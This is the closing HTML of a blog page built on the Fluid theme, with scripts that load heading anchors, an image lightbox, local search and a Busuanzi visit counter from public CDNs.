  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="../../../../js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="../../../../js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
